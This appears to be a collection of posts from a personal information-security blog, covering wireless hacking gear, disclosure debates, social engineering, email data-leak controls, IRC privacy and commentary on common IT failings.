Protect yourself with a virtual private network. I'm not sure I would suggest people use a third-party VPN service. Home consumers on their own equipment, sure, but not corporate users who think it would be safe to transmit possibly-sensitive information through a third-party who may or may not be credible. Too many people think that just because they pay money for it, it must be on the up-and-up. Instead, corporate users should look into what their corporate support is for VPN use. Home users can go the *very* technical route of hosting their own VPN/proxy system, or utilize the pay-for service if they want. I think if email is encrypted, web site logins are protected via SSL, and cleartext IM service not used, most users will be fine without a VPN.

Beware phony hotspots. First, I hate the term "evil twins." We've had a better term for this for years now: "rogue AP." While there is not much most users can do to protect against the rogue AP problems, I do like his two suggestions. Ask the staff if they have a hotspot and what the name is. And if you see two of the same name, don't connect to either one. Any futher security against a rogue AP is either overkill for most users, or is really the responsibility of the hotspot establishment.

I've decided that as I move forward with my site here and my posts, I'm not necessarily going to be completely PC and try to be pleasing to people. I want to take a stance and not feel like I have to assuage anyone else, especially with my own feelings and site. :)

So, where do I stand with full disclosure? First, I think we need to buck up, let people do their thing, stop quibbling about how to properly disclose, and just move forward with our goal: security. We don't sit here whining about how we can't control the environment and then let security slide until we can control the environment. It is unknown, ephemeral, ever-changing. Whether someone practices full-disclosure or protected disclosure, I don't much care: I still have to practice security and I need to be able to roll with the punches and what the environment hands me.

There are two caveats to this debate, which few people seem to address when passionately debating this topic. First, there is the entire full disclosure concept and whether we should practice it. Second, there is the question on whether security professionals should practice full disclosure or more "responsible" disclosure.

Whether an attack vector, vulnerability, or known proof-of-concept exploit is available or not, I would rather know about these items as opposed to not know about them and hope that an attacker doesn't secretly use them against me. If someone has found a hole and will report it to the vendor reasonably, it should be a security researcher's position to assume two other people in the world know about the issue as well. And are actively exploiting it or soon going to. Or maybe have been previously. We cannot squealch communication amongst ourselves and expect to keep up with attackers. I am in favor of full disclosure.

On the second part about security professionals, I have less opinion and think it is a case-by-case issue.

In the end, like nature, what doesn't kill us only makes us stronger and more resilient.

Update: I just wanted to add to this that I really don't necessarily trust vendors. Vendors are economic entities, and most of the time the media and researchers end up interfacing with the ineffectual and smoke-screening PR and Marketing sides. I don't trust that, and if I were to weigh my trust of vendors against my desire to know about the problems, the vendors do not typically win. This would change if vendors not only fessed up to holes they patch, but would also be liable for any damages incurred through direct use of those holes. Of course, then I see vendors getting slimier and doing the whole lawyer dance jig... In the end, vendors need to also get off the soapbox about responsible disclosure and just be up front and honest with the community and the world. Painting a picture of rosy security happiness where even puppies and rainbows can use their software without a care in the world is a dying approach. Security is merging with business in the back office, but what about the front office?

One of my favorite questions to ask pen-testers or other security assessors is how often they are successful and what techniques are the most successful. I imagine social engineering and physical attacks have a very high rate of success; in fact, I wouldn't bat an eyelash if pen-testers claim those are 100% successful when attempted. I'm sure there are many other ways they can own a network, but when they run into a tough cookie to break, I wouldn't be surprised if those methods combined with some wire sniffing yields positive results almost all the time. This article I read this morning caught my imagination:

Core Security Technologies has never failed in its spear phishing tests against large organizations, Caceres said, an indication of the task DOD faces as it attempts to battle its latest network threat. The human factor which requires e-mail users to carefully examine their messages, plays a critical role in defeating spear phishing, Caceres said.

I think this is why discussion on user education is still rather mixed. Most everywhere I read that user education is necessary as we build security awareness and programs in organizations, with this as proof that we need more education. Others will claim that user education is not going to solve this, and we should focus more on technology and other aspects. They will also cite these results by saying that getting intelligent users who consistently make the correct decisions is a losing battle.

At any rate, I love hearing about success rates and common means of access into networks. Jeremiah Grossman has been doing a related survey for web application specialists for a few months now, and has been quite readily and hungrily accepted.

I wonder if there are similar surveys or data for pen-testers?

Update: Of interest, Dana Epp pointed me over to a presentation on combating social engineering.

Not a huge deal, but it looks like one of those nicer sites that I don't see many people talk about has had a facelift. Whitedust doesn't display correctly for me at work on IE7, but it does look like they have ramped up their news coverage and now report quite a wide array of things in the RSS feed. Their news reminds me a lot of Rootsecure: some news, some articles, some podcasts, and so on. Always been some good stuff there despite them being a relative new-comer to the scene and UK-based.

Ordinary people see the means of victory but do not know the forms by which to ensure victory. -The Art of War Chapter 4: Formation

Am digging into my inner wireless geek this month as well. This means buying a little bit more hardware. Most of this stuff is best available on eBay and I plan to get my hands on some of these things soon.

Orinoco Classic Gold wireless PCMCIA card x2
Sharp Zaurus SL-6000
AmbiCom compact flash wireless card (or similar)

The Sharp Zaurus runs on Linux and has internal wireless. This means I can run Kismet on it. I already have an older Dell Axim X5 that I picked up at my old job and totally forgot I still had (and if I want another one for some reason, they seem dirt cheap on eBay). It has no internal wireless and runs Windows PocketPC, but I can put the compact flash wireless in this guy and get it to run. It also gives me the ability to run Ministumbler if I wanted to. I'd rather use Kismet and the Zaurus, but I got lucky in already possessing a little-used Axim.

Now, why would I want both Kismet and Ministumbler? First, some people simply respond better or worse to Linux or Windows. If I don't want to show someone how to do wireless tricks, I'll glaze their eyes over with Linux. If I'm looking to impress a gir...err...a manager with pretty colors and graphs so they spend money on or for me, I may get better results on Windows and Ministumbler. Second, Ministumbler is an active recon tool, so it will only see networks that have the SSID broadcast. Kismet is passive. While it will see non-broadcast SSID networks, I'm not yet sure how it sees them if there is no traffic on them..

Now I just need to pick out a GPS unit (I don't want to spend much, I'm not an extreme outdoorsman who needs something amazing) and possibly decide if I want to explore an external antenna or hold off on that. All told, I don't expect to spend more than $60 on the wireless cards and maybe $200 on the Zaurus.

Also just saw this 2-part article on SecurityFocus about wireless forensics.

It is interesting to hear us be adamant about perfection in security, whether it be perfect devices, perfect approaches, or perfect coding. Really, digital integrity pales compared to personal safety. Do we expect perfection in being safe when on the road? Do we demand that cars be built to absolutely withstand the stupidity of drivers? Do we move to diminish the role of the user when driving? Do we do much beyond laws, liability, some technological improvements, and a common understanding that green is go, red is stop, yellow is speed up and pretend not to notice anyone else, and lines are guidelines on traffic flow except in parking lots where they are so much street grafitti? Ever try to play traffic cop in your car, where the guy behind you wants to speed and basically blows out his O-ring having a caniption fit behind you while you drive the limit (yeah, me too, it's fun because I can be a dick now and then).

It is interesting that we accept a certain level of reasonality when it comes to our safety in life, but become hardassess when talking about digital security.

Have we achieved perfection in physical security, whether it be at home or in the workplace? It might sound like I am being defeatist. On the contrary, I say this all very enthusiastically. Update: I am going to amend, but not remove my original post above. Yes, there are differences in my choice of analogy and the security world. In too many cases, we don't end up living with our bad choices on the road, but in digital insecurity, we end up living with them. Ask any identity theft victim how hellish their life has been since. Likewise, I accidentally dismissed one thing I thump a lot when it comes to the digital life: efficiency. If a traffic accident were like a digital security incident, then one accident might end up affecting every single car built in 2003 in the state that is currently on the road, and when others currently at rest get started up in the morning, they immediately suffer the same result. One obscure issue in MySpace that only 50 people even understand could result in a worm that affects many thousands of people.

It amazes me how slowly wireless has been tackled, especially as everyone has completely jumped on Office products and browsers with all sorts of problems. Perhaps this year will usher in some more changes?

By way of Whitedust, I was pointed over to a pair of NetworkWorld articles. The first deals with new laws and guidelines about business-run wireless networks, both public and those intended to be private. In addition, it tackles vendors who should not default insecure or at least give users some guidance on securing those devices. These are seemingly easy and no-brainer topics, but yet implementation is such that I am astounded about the lack of attention wireless technologies receive. Heck, even insecure cell phones get more press compared to the data networks! The second talks a little bit about 802.1X (in that sort-of-technical-but-not-really-technical way the NetworkWorld writes).

More laws make me happy when it comes to securing wireless and our digital world. But more laws also make me say, "D'oh!" a few more times, since I am one of those people who likes to drive around and see what open wireless networks there are, and hopping on one when I have a need (when traveling or at a friend's place, for instance, and just hopping on an open neighbor network).

Just what I need, another feed/link/dashboard! But I will say I kinda like what Security Database has put up. I especially like the security tools alerts which are RSS-able.

Ever since Joat made mention of purchasing one, I've been eyeing the Wi-Spy and have it marked up on my "to buy" list for the future. Today, though, I see Joat received an email informing him that the price was going to go up in February. In fact, it is doubling. This little tool is far too cool to let pass away at a higher price. As far as I know, anything comparable is many hundreds of dollars more expensive, so I might move this up my list and get it in the next week or so. It can be bought off ThinkGeek as well as the manuf. site.

I've worked with SSL extensively, as has any sysadmin that knows what a web server and SSL certs are. But what about the real dirty guts of SSL? Sometimes, topics like this are difficult to grasp, but I found something that made enough sense to me that I re-wrote the process of an SSL session negotiation on a piece of scratch paper just to visualize it. Palisade has a question and answer about SSL which is written in very plain English for an intermediate to understand, and it actually makes complete sense to me! Other quiz questions are also available, although some are a little less interesting to me. Reading about HTTP cache smuggling is interesting (and makes sense, since you can hijack HTTP connections anyway, which can be fun on wireless with airpwn). .NET best practices are not quite as interesting to me right now.

I'm still settling into what I want this blog to be, so please bear with me. I'm also ramping up my studying for the CCNA which I need to make sure I take sooner than later and get it done with, plus all my other smaller projects at home. This weekend we are scheduled to get lots of freezing rain and about 3-7 inches of snow Sunday. Unlike other parts of the country, though, we're used to it and life moves on just fine and the Internets don't disappear with the power when some flakes drop!

Turns out Andy ITGuy also has the same Art of War desk calendar that I have and posted some feedback on this entry yesterday:

"Generals in the field must already be acquainted with all the sciences of warfare before they can command their own soldiers and assess battle formations." Chapter 3: Planning the Attack

It took me an extra day to revisit this topic, but I think this is a difficult place in security management and IT management. It is difficult to know so much about the sciences of our warfare. It seems difficult enough to even brush against all the various topics that need to be dealt with. I've worked for managers that couldn't do my job for the life of them, and they never commanded the trust or respect of the teams they managed. I've also worked for managers who could do my job, and they were much more effective in all aspects. But there is still so much to be informed about these days.

From Whitedust, I was pointed to this interesting article about employees who have left Google. I am inspired by hearing that a number of these people were far older than I am now when they started at Google. Sometimes one gets bogged down with that thought that only happenin' things occur to the brightest students fresh out of college doing amazing things. That's the flashy story you always hear. That if you don't jump up high enough out the doors onto the rungs of the career ladder, you'll burn out before getting up higher where you want to be. Really, that's not true, and that's something to continue to look forward to through my entire career and life, to be honest.

I'll put up a better link later when I find one, but a recent presentation and paper (I printed them out yesterday but have not read them yet) on a Snort algorithmic vulnerability has been talked about and patched. The vuln would cause Snort to spike the cpu to 100% and eventually crash. Why is this useful? This is a lot like someone cutting off the alarm systems before robbing a bank. You can even do this externally if a company has Snort running outside the firewall (not uncommon in order to determine differences across the perimeter defenses) and that same server is running the inside Snort instance. Since this is an easy but technical exploit, I suspect this to be packaged eventually into attack toolkits rather quietly. I would suspect old Snort instances may stay in production for years in some cases.

I didn't get but three paragraphs into Bruce Schneier's latest wired.com article about secure passwords, and I came across, "Your encryption program's key-escrow system is almost certainly more vulnerable than your password, as is any "secret question" you've set up in case you forget your password."

How often do botnet herders need to break into a system by gaining access to the password? And once they get in, how often do they actually ever care about the password? Not often, I suspect. Why care about the password if the user runs your program as their already-auth'ed credential? Why worry about laptop encryption when the user is already logged on? How often have I seen someone walk away from their laptop at Panera or Starbucks and not lock it? Point taken, though, that passwords, while targeted and popular, are maybe not the weakest link any more, just like network-borne attacks are quiet compared to fashionable web app attacks lately.

I liked this article on the NYTimes site about email uses and abuses. How do you stop people from forwarding work email to a place they shouldn't, such as web-based mail services?

Well, the answer is that you can't, and you really don't need to bother trying to do so. Where I work we block port 25 outbound except when from certain servers which have strict relaying settings. We also utilize SurfControl which cuts into web-based email services such as Gmail, Yahoo, Hotmail, Hushmail, etc. The problem is that I can still just find a service so obscure that the filters don't catch it...such as my own mail server. Or I can just tunnel over something else and get there. But you still really can't stop me from e-mailing a Gmail account any more than any other account unless a company has really no business communicating with the world outside its own walls.

So what do you do? In something like this, it helps to realize and accept that prevention is impossible. In that case, how to you mitigate, minimize, log, audit, and CYA without being a barrier to the company's purpose?

1) Evaluate why your users would want to send email to their home-based email accounts, particular webmail. Most users are not malicious and are only trying to get work done in the easiest way they know how. Maybe they want to work from home. In that case, provide web-based access or, better yet, a full-featured way to connect to their work account from home without all the additional hoops of a VPN and such. People using Exchange have little excuse to not be using OWA and a nicely-featured web front end. Ask why the users are doing these things, and then provide them such easy and logical solutions so they don't try to circumvent the process.

2) Obviously, log outgoing mail. If someone does keep trying to email out sensitive information, logs are necessary to track it. There should be one or two levels of logging. First, log all mail headers incoming and outgoing so that you can track activity. Second, such as in the article's hospital example, filter and log data in mail that is leaving the network, for instance medical records and other personal information. Obviously the second level of logging is more intensive, and shouldn't be bothered with unless the company has particular need.

3) Retain the ability to monitor employee email usage down to even reading their email. While this ability shouldn't be exercised all that often (how many employees are happy about others reading their email, honestly? and how many unhappy employees are the productive employees?), the policy should keep this option open in the event of suspicious about a truly malicious user. Authorization should be limited to HR, a direct manager or two, or approved technical staff, with no party acting alone. This is easier in some organizations and more difficult in others that have different work/life balance expectations in employees. The more an organization is sympathetic to the converging role of technology at work in personal life (kinda like personal phone calls to the doctor), the less hands-on the policy should be. Some companies will actually need to have staff regularly reading actual emails for regulations complicancy, and that's fine, too, when needed.

4) Block outgiong 25 and incoming 110 (and other common ports, like Gmail's ports) to only authorized servers. This won't stop people from web-based email or completely non-standard setups (I can tunnel it on any port I want, really), but at least a huge swath of people will be prevented from storing and sending email from their workstation mail client. Besides saving storage space and resources, no one needs to accidentally send out an email to a client from their PajamaMonkey69 email account at Yahoo. Also keep tight control on mail relay settings for those approved mail servers. Attempts should be logged and investigated, especially when originating internally.

5) Software policy should drastically limit user email clients to one (maybe two) approved email client applications. Make things as standard as possible. Manage that app properly.

6) Education. Education is not a panacea, but at least educate and teach employees how to use the tools given to them, and why circumventing them can put the company, themselves, and their clients at risk needlessly. This also should help draw out difficulties they may have with the tools and maybe expose why they circumvent policies in the first place.

"A military body goes through myriad transformations, in which everything is blended. Nothing is not orthodox, nothing is not unorthodox." -The Art of War, Chapter 2: On Waging Battle

It has been years since I've been on IRC regularly. I think I first got on IRC back in 1995ish when I moved from AOL over to a real ISP and thus needed to find a new place to chat. While I didn't really chat about anything technical, I stayed a near regularly in IRC until after college when around 2002 I kinda drifted away. I mostly stuck to gaming chats and once my gaming took a lull so too did my IRC days.

However, more and more I see security/technical groups with a presence on IRC, particularly freenode.net. As such, I started my next mini-project last night to get my ass back on IRC regularly. My one requirement for doing so, though, is that I want to be able to hide my host name (IP) or otherwise mask/reroute it. I don't really have any external servers available to proxy or bounce off of, but I think freenode itself will let me cloak my host name, which might be enough. Of note, I read up on bouncers and might put one up on my server just to see what that is all about.

Fun times, and it'll be nice to get back on IRC for some shoulder-rubbing. I also need to get my ass on a forum somewhere as well, but that is predicated on getting at least one of my systems up on a proxy somewhere (something I should do anyway). Yes, I like my privacy and I dislike making a target of myself...and no, I don't antagonize people or anything. I just prefer obfuscation for as long as it holds out.

If I get on freenode, I'll be authed as LonerVamp, of course.

Whitedust pointed me to Emergent Chaos with an announcement that obscurity will save us and we can just hide our files someplace unexpect and be safe! Well, ok, mordaxus was nearly as sarcastic as I was in that last line.

I just have two points in mentioning this. First, I wouldn't argue against someone who says that encryption itself is simply a form of obscurity. It is obscured because a key/passphase is not known. But know that bit of information, and encryption is done. Of course, this means every password system is also a form of obscurity...but I still wouldn't argue with that person to any great length.

Second, there are plenty of places to hide files in Windows machines already. Alternate Data Streams in NTFS have never gotten the attention it deserves, especially since few tools poke around in there, and those that do are sloooow. I would bet that few people even know about ADS and fewer will ever bother to do a scan for those files. Of course, I'm not saying this is protection for passwords and financial information. I would more use ADS for hiding porn stashes...

These are not meant to be related, I just wanted to save them.

"Great wisdom is not obvious, great merit is not advertised. When you see the subtle, it is easy to win -- what has it to do with bravery or cleverness?" - The Art of War, Chapter 4: Formation

and

"IT must balance three T's: time, talent and technology. Today, the tendency is to throw technology at a problem and in so doing, reduce the need for talent (expertise) and reduce time. I recall my colleague Chris Blask saying, 'Computers are fast and people are smart.' Invest first in talent. Give them time to plan and choose technology that will allow them to be smart, *fast*, and you'll have spent your own time wisely." From a blog entry by Dave Piscitello.

This was an interesting enough tool to spend an hour working on. SearchWinComputing has a quick run-through on some code (batch file) that will launch various Windows domain and exchange MMC consoles as another user. Basically you run the file, type 2, supply your domain admin password, and then the AD Users and Computers MMC should launch in domain admin context. Not bad. Although this is one click, one keystroke, and one window longer than my current method (right-click a shortcut), I certainly would need 8 such shortcuts to do what this batch file does in one. I like simplicity, so 1 > 8 in this case.

However, there is some errata in the instructions. I also had to scrounge choice.exe from a site called dynawell (Google for choice.exe), and I snagged sleep.exe from the Windows Server 2003 Resource Kit, although sleep is really not all that necessary if you just take that part of the code out. Hell, it's been a long time since I delved into batch files, so maybe choice can be replaced with CASE for all I know.

Remove all the comments which are scattered in the code, typified by mixed case text. Change the paths to include the backslash such as c:\. Change the options to read :ONE instead of Option One:. Change the runas user to your domain admin or necessary admin to manage these tools. Correct the typo on option 3 "SItes."

Now, I am not one to use fancy or even simple tools that are not usually always available. I've worked on enough systems and in enough ways to know that it sucks to become really accustomed to doing something one way (such as with shortcuts), and then be like a fish out of water when in a situation where I don't have my nifty customized tools. Similar to how I rarely customize or "prettify" Windows anymore. I don't need to spend 4 more hours after a reinstall making it pretty. So little tools like this are typically only minorly used by me. I like being able to sit down at nearly any Windows machine and knowing what I have available and what I would need to do to get what I want (resource kits, third party tools like procmon, etc). Either way, I think this little script can be useful for now.

Just FYI, I am currently bouncing around IRC on irc.freenode.net as LonerVamp. I may not be hanging out much of anywhere lately until I figure out how to manage my presence there, but I am around and looking for some home channels to hang out in. I am also looking to run an IRC bouncer/proxy on my server which can keep my presence online and I can then just attach using whatever system I happen to be on at the time. I'm not sure how happy that will be, but I'll be trying it. It has certainly been a long time since I was an IRC addict (about 6 years since I was a perpetual presence), but it is comforting to be back.

I tried JBouncer which is a java-based IRC bouncer, but I don't like the user info it appends to my user when someone does a whois on me. I found the place in the code that sets those variables, but I have been unable to re-compile the java (I've never coded nor compiled java before). I hope to try out Night-Light before the weekend.

Has anyone seen or used or heard about AirPcap? At $198, it is just a little bit above my "eh, spend the extra money and see how it is" range. I saw a blurb about this in the latest Hakin9 magazine.

This was too awesome to pass up putting here. By way of Mike Rothman comes a post of 16 dirty little sayings overheard in IT. I'll add my own commentary to them. What makes this an awesome list? I have heard most of them spoken, multiple times.

1. "It’s only a temporary server. It’s not for production use" This is the bane of sysadmins. This request should always be met with, "what is your hard end date, then?" Too often this uttering is just a way for someone to get something done without properly justifying or defending it and I really hate it. Too often "temporary" turns into "permanent" or even "production" without warning or planning. The only thing worse is when they use their own workstation or some other box without ANY warning. "What do you mean you used your test QA machine to host a new critical ticket system?!" Without admins being complete hard-asses, this would happen constantly.

2. "We’ve tested the backups. They read back just fine. Never restored for real though."I hate this one too, because if there is one thing I think is most important in IT, it is backups. What is worse, though, is *not* hearing this spoken but having it as the unspoken truth. Too many admins never test restores until a restore request. Always test, always verify. I learned this back in science labs in high school.

3. "Patching? yeah. That’s on our list. We’ve been looking at SUS for a while now, just haven’t got round to it."Another classic task procrastinated in our field. Funny how the fundamentals fall into that basket so often...

4. "Of course staff know about the security policy. They have to sign a form at induction. I did when I started 5 years ago." ...along with the other 55 pages of new employee information that grazed us like a gnat and we brushed it away to figure out where the nearest bathroom is and how to log into our system.

5. "We have documented procedures. Everybody just ignores them. Except me, of course."I say this a lot, both at my previous job and my current one, but I admit I sometimes go by memory as well, especially for things I know inside and out and I know the steps have not changed. Again, though, for such a detail-oriented career, IT people too often ignore documented procedures.

6. "Our apps developers do their own thing really. I think they have procedures for promoting code, but I’ve never seen them." This is common too, especially if newer admins were not involved in creating the infrastructure that the developers use to promote code. This isn't necessarily such a bad thing as long as the admins can support it (per their job) and there is some audit trail available so they can answer who screwed up production when it happens. Security should at least know how they do this, though, so that this risk is minimized.

7. "Users have been told a hundred times not to share passwords"Yeah, the only cure for this is a clue bat. The best mitigation besides that is simply constantly changing passwords and stringing someone up when something really bad happens with a hijacked account due to sharing. Or perhaps legal/HR when told, "Well, they share the account, so you can't fire one as we can't PROVE she did it, it could have been either of them."

8. "Security Policy. Hang on. We do have one somewhere… Dave! Have you seen that policy file anywhere?"Haha, yup! My last company did this every time an audit was at the doorstep. And despite me writing some up, they rarely got signed off up the chain of command and even less were enforced. In fact, they never were...

9. "We’re developers. The sys admins make our job so difficult. We have deadlines you know!"This one sucks, but as much as it pains me to see it, there is that very difficult task of making sure developers and admins are reminded that we're all on the same team trying to get to the same clouds in the sky. But both sides do also need to admit that they don't know the full picture. Too many developers have no idea about networking or systems, and many admins have no idea about proper coding and the efforts involved. Security is one thing, but preventing the business folks from getting jobs done is another thing. At the end of the day, if security is holding the business back, the business could lose revenues enough that security is shown the door.

10. "The auditors needed Internet access. WiFi was the answer"Wow, almost word-for-word I've heard this a few times. Also "guests" and "clients" could be put in there. My last job put up an open wireless to do this. Thankfully I've not experienced firsthand someone putting up wireless without asking (the last job asked), but I have heard those stories from people in companies far more critical and important than mine. Yikes! Are CFOs really that stupid? Yes. And he also thinks he's too important for parking spaces and so parks in the fire lane.

11. "Compliance? That’s an HR thing, right?"The age-old "who enforces the company policies?" question. HR or security/IT?

12. "A security breach? Don’t think we’ve ever had one. In any case, we’d just call Dave."In my last job, that would have been me, hehe. This statement just makes me cringe on a number of levels...

13. "The Managing Director wanted it"I think I've heard this more than any other utterance here. Someone in authority pulled their weight and said, "just do it," regardless of how moronic and terrible the task was. I think this right here is where 80% of our stress comes from.

14. "We had a penetration test last year. We passed with flying colours."Wow, I love this one! Who the hell actally passes pen tests with flying colors? If so, you had a vulnerability assessment, not a pen test. And the assessors sucked. No one truly passes a pen test. Every environment has issues, and if they are not technological ones, they are logical and procedural ones. Given a week on site, I really believe no pen tester should walk away stumped and with nothing to do (assuming full physical access), I've seen stumped external attacks against a really solid firewall before, but full assessments should realistically never come back like this.

15. "Yeah, so it’s SQL injection. But our developers tell us there’s nothing of value in the database anyway."I've heard similar things as well, where developers either don't think about the data or feign ignorance.

16. "Marketing are the worst offenders. We don’t support FTP so they rented a cheap web server and uploaded data to that instead." Ahh, human ingenuity. Where there is a will, someone will figure out how to do it, even if it is hokey and terrible and insecure and costly and ...so on. This is why security needs to be an enabler, and management needs to be behind security so circumvention doesn't just happen.

"The comprehensiveness of adaptive movement is limitless." -The Art of War, Chapter 5: Strategic Advance

This reminds me of recent comments from Bejtlich about IDS/IPS devices that are alert-based but have little additional knowledge for the analyst. That is not very adaptive, and as such, ends up affording little value below the surface. Being able to be adaptive in IT and especially security is an amazing ability, as opposed to have very complex, rigid, or incomplete implementations that don't afford much in terms of quick reaction, seamless changes, and ability to get the data you need. It also makes me think of on-demand sniffing needs. Can a security analyst quickly span ports into a pre-configured system set to sniff traffic, or will the analyst have to jump through hours of hoops to get this set up for an emergency?

One thing I have learned in networking, security, and really IT in general is that you take any opportunity given to pick up some decent hardware. While I sometimes pick up really crappy hardware, there are always times when you get something decent for very little. And nothing is more frustrating than being inspired to do some tinkering only to find no spare boxes that I want to risk messing around on.

So tonight I picked up a motherboard and CPU for $40. The motherboard is an ECS K8T890-A which has dual DDR400 RAM and a Socket 939 which is for AMD 64-bit processors. This ECS may not necessarily be a gaming rig foundation, however it should suit my purposes just fine, as I have a gaming rig already (although the specs are getting really dated). This mobo has an older BIOS which does not really allow overclocking (quite ok, I don't overclock). The AGP slot is also not really a true AGP slot and instead is a modded PCI bus connection. This means pretty much only older video cards are supported (3.3V), and I'd never get the full power of an AGP card anyway. Good info here for my own future reference. The board does support SATA and RAID.

The processor is an AMD 64 3500+. This translates into a 2.2Ghz CPU. The CPU is already mounted with heatsink attached, and I've not had a chance to boot it up yet. I don't think I have a proper PSU to support this board right now, but will be collecting some parts over this winter and spring.

This mobo/CPU may make a great foundation for another always-on server that runs Linux as a vmware host and contains a few VM images of my choosing. The board still has great specs for a non-gaming machine. I just need to load it up with RAM and disk space. Unfortunately, the max RAM will be 2GB, which should only run me roughly $200-$250. And I should be able to pull 350GB+ with two disks for under $200. Another $100 for a 500W PSU. And then look into whether I can use this all in a current old chassis or buy up a new one with fans for roughly another $100 and a non-exciting graphics card (or just use on-board) for $60.

Overall, that's still not really all that bad. About $800 for a good solid box that I can utilize in multiple ways. I could even go a bit cheaper in my parts and do Kingston memory instead of Corsair and still be just fine.

I know Microsoft and other sites will take pains to force people to use IE, but I didn't think I'd find a site that would tell me their site was incompatible with IE and I should use Firefox (even though it lets me click forward and get in anyway, which makes me wonder what's so imcompatible). AWStats, a web stats app typically for Apache and Linux, tells me such. Talk about annoying both ways.

Michael Santarcangelo has soft-launched the Security Catalyst Community forum site. This is something we do need, and I'm enthusiastic to see where this community goes. While I think this might be an excellent initiative, there are some concerns I'll just post here because they're really not important enough to bring up to Michael S or those forums.

First, growing a community is not easy unless you happen to have something that draws people in on its own. That's rare, really. I've done community-building work back in gaming where I ran gaming leagues and competitions and basically worked hard to keep the community participating and just plain caring. It is not easy work and is not something you can just say, "I'll build it and they will come." Many forums and sites have sprouted with that mantra and within 6 months the only posts you see are spam posts and what might otherwise be seen as the dust and tumbleweeds of the Internet. It takes constant work by dedicated persons, constant content, and lots of posting and giving people a reason to show up. What makes this even harder? My communities were gamers with lots of leisure time. This community may be made up of a lot of very busy professional people. Hopefully this community will recruit some good people to lead the discussions and provide a reason for everyone else to slowly filter in and continue to contribute.

Second, I'm undecided about the somewhat informal policy of registering with one's real name, or at least putting full name in the signature. I'm not sure the goal of this other than to look more professional. I don't think we need a stuffy community, but rather one that is willing to talk openly. As information security professionals, I think we, of anyone, should be empathetic to our decisions to control or at least mitigate information leakage. Yes, I know McNealy will say my privacy is already gone, deal with it, and I agree with him. But that doesn't mean I have to let go of every device by which I maintain at least a little control. One of those is forums and comments on other sites. The only site that I really like to tie my name, online handle, and/or contact information is either through my own pages or someone deliberaly tracking me down. I will lose this battle someday, but until the world starts getting better equipped to deal with it, I'll still put up a fight. :) We can't let today's inability to deal with information and identity and the internet get in the way of our professional and (oftentimes needed!) informal communication. The people who want their names posted typically are the people who are branded by their names. They have an interest in making sure their name is out there (typically analysts and experts). Also, if my name is associated with the company I work for, I can't typically talk about certain things without people putting 2 and 2 together and knowing my company has an issue with security concept X. That sort of secrecy is one of my biggest issues and it makes it hard for any of us to properly learn from other's mistakes. That's really one of the biggest reasons I enjoy things like Infragard (NDAs) and other local informal groups of buds. There are many very smart people out there with very valuable ideas that may not want to be associated with their given name when online.

Kinda like McNealy saying my privacy war is already lost, so too is the war on anonymity online. Not only can you not always completely stay anonymous online, but (oddly enough), you can stay pretty damned anonymous online. I don't think a forum community is going to be truly able to maintain the informal policy of non-anonymity. I could pick some random name and bounce through proxies to join in with a free email address and change my grammar/writing style. We shouldn't need to do that here. Likewise, it should be enough that the moderators have the ability to check IP and logs and deal with any miscreants in due fashion.

Besides, come on, there's plenty of Michaels running around here! Hell, at my last job we had 3 Michaels on the same team of 4 people (the odd one out had Michael as his middle name). Other than deliberate impersonators, I've yet to see another LonerVamp. :)

Nonetheless, I look forward to participating as LonerVamp in this new community and seeing where this goes. There's a lot of vury smurt people whom I regularly read already signed up!

One neat thing about running one's own email server is that I get to see all the spam that comes in. After a number of years up, my most-used email addresses are getting about 100 spam messages a day on busy days. Spam used to (as in 2 months ago) come in with names in the subject line. Typically I'm just, yeah right, unless it says Michael or the name of someone I might expect email from. Then I realize just how easy it is less knowledgable users to open spam. Typically I see mostly pharmaceutical picture ads, stock scams, and bootleg software.

The spam moved into chinese characters (wtf?) and in the past week or two I've seen a lot of spam sporting current news headlines in the subject line. Not bad, impressive!

My mail server's spam filters don't catch everything, altough it tends to catch about 50% and label them as SPAM for my mail filters. I really don't expect much when I'm using non-SpamAssassin tools that don't cost anything.

RSnake posted about social engineering. For as much work as I do with networking and computers, I still maintain that the highest success rate attacks on a target are physical and social engineering attacks. The only thing stopping most people from doing more of those things are social mores and the stigma of getting caught and not being able to maintain the anonymity like we have on the Internet.

Andy posted what is maybe the biggest question (and toughest) we should consistently ask ourselves in this field: What is the biggest problem facing security professionals today? Andy answered user awareness.

I'm not so sure I could so quickly answer just one thing as our biggest problem. If I were to tell a VP where to best spend his money, I think I would answer either technology to protect the users and data, or spend money on educating management, not all users. Managers need to lead, and unless managers are aware of the problems, users aren't really going to give much more of a shit. Companies are economic entities, and users are entities that answer to their managers. Pressure can be applied by educating stakeholders such that they hold management accountable for security. But we all know that devolves into checklists, grades, certifications, and basically the representation (right or made up) of security...which may or may not be the real state of security.

An example of technology mitigating the user problem is in laptop encryption. Users can continue to be stupid and lose laptops because they leave them in plain sight in their cars and put data they shouldn't on them, but if they are encrypted (technology), that user mistake is dramatically mitigated. Of course, this may perpetuate the cycle of relying on technology and ignoring user education...but that's at least where I'd perhaps put my money first. Teach people to ignore spam and phishing and detect it and report it, or implement spam filtering good enough to minimize their exposure to those decisions, along with HIPS/detection to stop those fewer instances where they do slip through? Relying on users would keep me up at night, personally.

Complexity of our environments and technology advancements are also a huge problem right now. Environments keep growing outward and more varied. They're also just plain growing. Trying to create an infrastructure today that can be properly and securely grown for the next 10, 5, or even 3 years is highly difficult. Our work environments creep and grow, and we don't typically have the luxury to start over and build the house correctly to today's threats.

For all that rambling above, I don't mean to diss on users as being stupid and a lost cause. I do realize there are benefits to user education and I by no means would prevent user education or speak up against it. User education is truly part of a blended approach to security, and users are just another required layer to be protected and education, just like in the spam example above. I'm somewhat playing devil's advocate, but I honestly don't know if I would say user education is our biggest challenge. I think it is just far more complicated than that.

Update: After some more thought this evening and some time playing LEGO Star Wars (awesome!), I think one of the biggest problems we face is making sure our peers (and ourselvess) give management the best bang for the buck they can get, and give accurate and honest and truthful assessments and advice. Management needs our help to understand the reality of their state of security and how to properly tackle it. They also need us to keep hounding them so they don't become complacent or think the task is done. So yes, in a way, education is necessary, just not necessarily user-centric as much as tackling the user base from the top. This might include heavy training for IT folks as well; those of us who are laying the blocks and doing the securing and growing and actual work. Even if management is on board, they can only spin their wheels if their people are not getting it.

Fred Avolio posted this excellent list of security admin errors last year. It has been languishing in my bookmarks and I thought I'd post it here for posterity. Some of these are excellent issues, although some are not necessarily the security admin's fault.

Here is a list of 20 things most people don't know about Windows XP. Honestly, I didn't know a lot of these other! A lot of them won't mean as much to me right now since I don't do much desktop support, but XP is gonna be around for a lot longer. (Do some soul-searching on whether your company really has a reason to move to Vista? Seriously, do you? Other than MS dropping support someday, I doubt it.)

